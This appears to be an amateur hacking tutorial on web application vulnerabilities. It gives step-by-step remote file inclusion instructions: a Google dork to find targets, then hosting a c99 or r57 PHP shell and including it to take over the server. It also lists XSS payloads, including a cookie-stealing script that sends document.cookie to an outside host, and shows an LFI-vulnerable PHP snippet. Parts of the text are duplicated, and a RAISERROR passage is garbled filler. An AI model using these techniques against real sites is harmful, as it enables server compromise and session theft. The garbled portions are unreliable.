Web Application Vulnerabilities
What is Web Application?
A web application is an application that is accessed over a network such as the Internet or an intranet the term may also mean a computer software application that is coded in a browser-supported language (such as JavaScript, combined with a browser-rendered markup language like HTML) and reliant on a common web browser to render the application executable.
Web applications are popular due to the ubiquity of web browsers, and the convenience of using a web browser as a client, sometimes called a thin client. The ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers is a key reason for their popularity, as is the inherent support for cross-platform compatibility. Common web applications include webmail, online retail sales, online auctions, wikis and many other functions.
*1
Web Application Security
Web application security is a branch of Information Security that deals specifically with security of websites, web applications and web services.
At a high level, Web application security draws on the principles of application security but applies them specifically to Internet and Web systems. Typically web applications are developed using programming languages such as PHP, Java EE, Java, Python, and Ruby, ASP.NET, and C #, VB.NET or Classic ASP.
At a high level, Web application security draws on the principles of application security but applies them specifically to Internet and Web systems. Typically web applications are developed using programming languages such as PHP, Java EE, Java, Python, and Ruby, ASP.NET, and C #, VB.NET or Classic ASP.
*2
Hacking
Hacking means finding out weaknesses in an established system and exploiting them. A computer hacker is a person who finds out weaknesses in the computer and exploits them. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.
Web Application Vulnerabilities
Hackers today have an ever increasing list of weaknesses in the web application structure at their disposal, which they can exploit to accomplish a wide variety of malicious tasks.
New flaws in web application security measures are constantly being researched, both by hackers and by security professionals. Most of these flaws affect all dynamic web applications whilst others are dependent on specific application technologies. In both cases, one may observe how the evolution and refinement of web technologies also brings about new exploits which compromise sensitive databases, provide access to theoretically secure networks, and pose a threat to the daily operation of online businesses.
Web Application Vulnerabilities
Hackers today have an ever increasing list of weaknesses in the web application structure at their disposal, which they can exploit to accomplish a wide variety of malicious tasks.
New flaws in web application security measures are constantly being researched, both by hackers and by security professionals. Most of these flaws affect all dynamic web applications whilst others are dependent on specific application technologies. In both cases, one may observe how the evolution and refinement of web technologies also brings about new exploits which compromise sensitive databases, provide access to theoretically secure networks, and pose a threat to the daily operation of online businesses.
*3
Type of Web Application Vulnerabilities
? Backup files Security Vulnerability
? Blind SQL/XPath injection Security Vulnerability
? Code execution Security Vulnerability
? Common files Security Vulnerability
? Cookie manipulation Security Vulnerability
? CRLF injection/HTTP response splitting Security Vulnerability
? Cross Site Scripting Security Vulnerability
? Cross Site Scripting in path Security Vulnerability
? Cross Site Scripting in URI Security Vulnerability
? DELETE Method Enabled Security Vulnerability
? Directories with executables permission enabled Security Vulnerability
? Directories with write permissions enabled Security Vulnerability
? Directory Listing Security Vulnerability
? Directory Traversal Security Vulnerability
? Email address found Security Vulnerability
? File inclusion Security Vulnerability
? Full path disclosure Security Vulnerability
? Possible sensitive files Security Vulnerability
? PUT Method Enabled Security Vulnerability
? Script source code disclosure Security Vulnerability
? Sensitive data not encrypted Security Vulnerability
? Source code disclosure Security Vulnerability
? SQL injection Security Vulnerability
? TRACE method is enabled Security Vulnerability
? TRACK method is enabled Security Vulnerability
? Trojan shell script Security Vulnerability
? URL redirection Security Vulnerability
? XFS vulnerability Security Vulnerability
? XPath Injection vulnerability Security Vulnerability
? Blind SQL/XPath injection Security Vulnerability
? Code execution Security Vulnerability
? Common files Security Vulnerability
? Cookie manipulation Security Vulnerability
? CRLF injection/HTTP response splitting Security Vulnerability
? Cross Site Scripting Security Vulnerability
? Cross Site Scripting in path Security Vulnerability
? Cross Site Scripting in URI Security Vulnerability
? DELETE Method Enabled Security Vulnerability
? Directories with executables permission enabled Security Vulnerability
? Directories with write permissions enabled Security Vulnerability
? Directory Listing Security Vulnerability
? Directory Traversal Security Vulnerability
? Email address found Security Vulnerability
? File inclusion Security Vulnerability
? Full path disclosure Security Vulnerability
? Possible sensitive files Security Vulnerability
? PUT Method Enabled Security Vulnerability
? Script source code disclosure Security Vulnerability
? Sensitive data not encrypted Security Vulnerability
? Source code disclosure Security Vulnerability
? SQL injection Security Vulnerability
? TRACE method is enabled Security Vulnerability
? TRACK method is enabled Security Vulnerability
? Trojan shell script Security Vulnerability
? URL redirection Security Vulnerability
? XFS vulnerability Security Vulnerability
? XPath Injection vulnerability Security Vulnerability
Most common and Popular Web Application Vulnerabilities
1. SQL injection
2. Remote File Inclusion
3. Local File Inclusion
4. Remote shell upload
5. Cross site Scripting
SQL injection
What is SQL injection??
An SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a poorly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. SQL injection is a code injection technique that exploits security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
*4
How SQL vulnerability comes?
SQL Server supplies the message number 50000, which is the error number you get when you supply a text string to RAISERROR. (There is no procedure name here, since I ran the statement directly from Query Analyzer.) Rather than a string, you could have a supplied a number of 50001 or greater and SQL Server would have looked up that number in sysmessages to find the message text. You would have stored that message with the system procedure sp add message. (If you just supply a random number, you will get an error message, saying that the message is missing.) Whichever method you use, the message can include placeholders, and you can provide values for these placeholders as parameters to RAISERROR
SQL injection Tutorials
Remote File Inclusion
Remote File Inclusion is the most common vulnerability found in many web servers. If the remote file execution is performed successfully, we can get control over the server and make it execute any command of our wish. So how exactly we can do that?
First we need to know the websites which are vulnerable to this, using the following Google dork:
We get number of websites listed of the form: www.Targetsite.com/index.php?page=Anything
Dork: "inurl:index.php?page=".
Finding the Vulnerability:
One by one, in place of anything, type and URL like http://www.devilscafe.in if the above link opens up the Google homepage, then it simples the website is completely vulnerable to Remote File Inclusion.
http://www.targetsite.com/index.php?page=www.devilscafe.in
The next step is to download a shell out of several available on the web, which is nothing but a payload in PHP. Most common are the c99 or r57 b374k etc.
Upload the shell to a webhosting site such as ripway.com, 110mb.com on another free webhosting websites.
Now you get to see the link to this shell as:
http://yourhosting.com/c99.php?
The successful devilscafe.in homepage was seen in previous attempt
http://targetsite.com/index.php?page=www.devilscafe.in
Now just remove the devilscafe.in and paste the link to your shell as shown
http://targetsite.com/index.php?page=http://yourhosting.com/c99.php
THUS, WE GET THE ACCESS ON SERVER
Local File Inclusion
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. A typical example of a PHP script vulnerable to LFI is as follows:
<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
Cross site scripting (XSS)
Cross site scripting (XSS) is a type of security vulnerability typically found in web applications which can be used by an attacker to compromise the same origin policy of client side scripting languages a lot of webserver by default are also vulnerable to xss.
Types of XSS
Types of XSS
Non President XSS
This is one of the most common types of XSS attacks you will find. These types of XSS attacks are possible when user supplied data is instantly used by server side scripts to generate a page, based on the users input.
President XSS
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.
XSS Queries:
<script>alert("XSS")</script>
Some web servers require the ending "/".
<script>alert('XSS')</script>/
Cookie Stealing with XSS "><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>
Single quotes sometimes help.
<script>alert('XSS')</script>Some
examples below of search engine XSS attacks:
search.php?query=<script>alert('XSS')</script>
search.php?query="><script>alert('XSS')</script>
search.php?query='><script>alert('XSS')</script>
Some web servers require the ending "/".
<script>alert('XSS')</script>/
Cookie Stealing with XSS "><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>
Single quotes sometimes help.
<script>alert('XSS')</script>Some
examples below of search engine XSS attacks:
search.php?query=<script>alert('XSS')</script>
search.php?query="><script>alert('XSS')</script>
search.php?query='><script>alert('XSS')</script>
I hope you enjoyed this article........!!
